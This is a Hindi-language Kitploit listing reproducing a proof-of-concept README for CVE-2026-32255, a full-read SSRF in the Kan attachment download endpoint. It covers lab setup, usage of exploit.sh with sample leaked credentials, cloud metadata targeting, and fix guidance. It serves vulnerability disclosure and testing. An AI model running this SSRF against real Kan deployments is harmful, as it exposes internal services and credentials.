Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc-cve-2026-32255 — यह रिपॉजिटरी CVE-2026-32255 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) शामिल करता है, जो Kan में एक उच्च-गंभीरता वाली सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है, जो एक ओपन-सोर्स प्रोजेक्ट प्रबंधन टूल है। | Kitploit
उपकरण/GitHubGitHub/koadt/poc-cve-2026-32255
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubkoadt/poc-cve-2026-32255

poc-cve-2026-32255

यह रिपॉजिटरी CVE-2026-32255 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) शामिल करता है, जो Kan में एक उच्च-गंभीरता वाली सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है, जो एक ओपन-सोर्स प्रोजेक्ट प्रबंधन टूल है।

रिपॉजिटरी देखें
2146 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

अटैचमेंट डाउनलोड के माध्यम से Kan SSRF (CVE-2026-32255) - प्रूफ ऑफ कॉन्सेप्ट

इस रिपॉजिटरी में Kan के लिए CVE-2026-32255 का प्रूफ ऑफ कॉन्सेप्ट (POC) शामिल है, जो एक उच्च-गंभीरता वाली सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है, जो एक ओपन-सोर्स प्रोजेक्ट मैनेजमेंट टूल है।

कमजोर एंडपॉइंट अनप्रमाणित हमलावरों को सर्वर से मनमाने HTTP अनुरोध करने और पूर्ण प्रतिक्रिया पढ़ने की अनुमति देता है, जिससे आंतरिक सेवाओं और क्लाउड मेटाडेटा एंडपॉइंट्स तक पहुंच संभव हो जाती है।

विषय-सूची

  1. भेद्यता विवरण
  2. POC चलाना
  3. एक्सप्लॉइट स्क्रिप्ट का उपयोग
  4. भेद्यता को कैसे ठीक करें
  5. अस्वीकरण

भेद्यता विवरण

CVE जानकारी

  • CVE ID: CVE-2026-32255
  • प्रभावित संस्करण: Kan <= 0.5.4
  • फिक्स्ड संस्करण: 0.5.5
  • CVSS स्कोर: 8.6 (उच्च)
  • CVSS वेक्टर: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
  • CWE: CWE-918 (सर्वर-साइड रिक्वेस्ट फोर्जरी)

विवरण

फ़ाइल apps/web/src/pages/api/download/attatchment.ts एक GET /api/download/attatchment एंडपॉइंट उजागर करती है जो S3 स्टोरेज से अटैचमेंट डाउनलोड को प्रॉक्सी करने के लिए है। एंडपॉइंट उपयोगकर्ता-नियंत्रित url क्वेरी पैरामीटर स्वीकार करता है और इसे बिना किसी सत्यापन या प्रमाणीकरण के सीधे सर्वर-साइड fetch() में पास करता है:

const upstream = await fetch(url); // no validation on `url`

एक हमलावर कोई भी URL प्रदान कर सकता है, जिससे सर्वर उस गंतव्य पर HTTP अनुरोध करता है और पूर्ण प्रतिक्रिया बॉडी क्लाइंट को लौटाता है। यह एक फुल-रीड SSRF है (ब्लाइंड नहीं), जिसका अर्थ है कि हमलावर पूरी प्रतिक्रिया सामग्री पढ़ सकता है।

प्रभाव

  • इंटरनेट पर उजागर न होने वाली आंतरिक सेवाओं तक पहुंच
  • क्लाउड मेटाडेटा एंडपॉइंट्स पढ़ना (जैसे, AWS/GCP पर http://169.254.169.254/)
  • आंतरिक नेटवर्क की पोर्ट स्कैनिंग
  • आंतरिक APIs से संवेदनशील डेटा का बहिर्गमन

संदर्भ

  • NVD - CVE-2026-32255
  • GitHub सुरक्षा सलाह - GHSA-qrx8-9hc6-jvqg
  • फिक्स कमिट

POC चलाना

पूर्वापेक्षाएँ

  • Docker और Docker Compose
  • Bash
  • curl

चरण 1: एक कमजोर Kan इंस्टेंस चलाएं

Kan v0.5.4 (अंतिम कमजोर संस्करण) को क्लोन और चलाएं:

git clone --branch v0.5.4 https://github.com/kanbn/kan.git
cd kan

आवश्यक पर्यावरण चर कॉन्फ़िगर करें:

cat > .env <<'EOF'
NEXT_PUBLIC_BASE_URL=http://localhost:3000
BETTER_AUTH_SECRET=poc-secret-not-for-production-use
POSTGRES_URL=postgresql://kan:kan@localhost:5432/kan_db
POSTGRES_PASSWORD=kan
REDIS_URL=redis://localhost:6379
NEXT_PUBLIC_STORAGE_URL=http://localhost:9000
EOF

नोट: यदि आपको dokploy-network के बारे में त्रुटि मिलती है, तो docker-compose.yml से dokploy-network संदर्भ हटाएं (पंक्तियाँ 9, 130-131) और docker compose up -d फिर से चलाएं। यह नेटवर्क स्थानीय रूप से आवश्यक नहीं है।

कंटेनर शुरू करें:

docker compose up -d

एप्लिकेशन http://localhost:3000 पर उपलब्ध होना चाहिए।

चरण 2: सिम्युलेटेड आंतरिक सेवा शुरू करें

एक अलग टर्मिनल में, शामिल मॉक आंतरिक सेवा शुरू करें जो एक संवेदनशील आंतरिक API का अनुकरण करती है:

python3 internal-service.py

यह पोर्ट 8888 पर एक सर्वर शुरू करता है जो नकली क्रेडेंशियल लौटाता है, एक ऐसी सेवा का अनुकरण करता है जो केवल आंतरिक नेटवर्क से सुलभ होनी चाहिए। वास्तविक दुनिया के परिदृश्य में, यह सेवा फ़ायरवॉल के पीछे अलग होगी और बाहर से अप्राप्य होगी। SSRF हमलावर को सर्वर के माध्यम से उस तक पहुंचने की अनुमति देता है।

चरण 3: एक्सप्लॉइट चलाएं

chmod +x exploit.sh
./exploit.sh http://localhost:3000

एक्सप्लॉइट स्क्रिप्ट का उपयोग

उपयोग

./exploit.sh <target-url> [internal-url]
  • <target-url>: Kan इंस्टेंस का बेस URL (जैसे, http://localhost:3000)
  • [internal-url]: SSRF के माध्यम से प्राप्त करने के लिए आंतरिक URL (वैकल्पिक, Docker ब्रिज गेटवे से स्वतः पता लगाया जाता है)

उदाहरण

./exploit.sh http://localhost:3000
=== CVE-2026-32255 - Kan SSRF via Attachment Download ===
Target: http://localhost:3000
Internal URL: http://172.17.0.1:8888

[*] Checking if endpoint is reachable...
[+] Endpoint is reachable (HTTP 400)

[*] Attempting SSRF to http://172.17.0.1:8888 ...
[+] VULNERABLE - Server fetched internal resource

Leaked content:
------------------------------------------------------------
{
  "service": "internal-config-api",
  "credentials": {
    "db_host": "10.0.0.5",
    "db_user": "admin",
    "db_password": "s3cret_passw0rd!",
    "api_key": "sk-internal-4f8a2b1c9d3e7f6a5b0c8d2e1f4a7b3c"
  }
}
------------------------------------------------------------

भेद्यता को कैसे ठीक करें

Kan अपडेट करें (अनुशंसित)

Kan v0.5.5 या बाद के संस्करण में अपडेट करें, जो प्रॉक्सी करने से पहले कॉन्फ़िगर किए गए S3 एंडपॉइंट होस्टनाम के विरुद्ध url पैरामीटर को सत्यापित करता है।

वर्कअराउंड: रिवर्स प्रॉक्सी पर ब्लॉक करें

यदि आप तुरंत अपडेट नहीं कर सकते हैं, तो अपने रिवर्स प्रॉक्सी स्तर पर कमजोर एंडपॉइंट तक बाहरी पहुंच को ब्लॉक करें।


अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक इस रिपॉजिटरी में प्रदान की गई जानकारी या टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।


खोजकर्ता: kOaDT ([email protected])

टूल डाउनलोड करें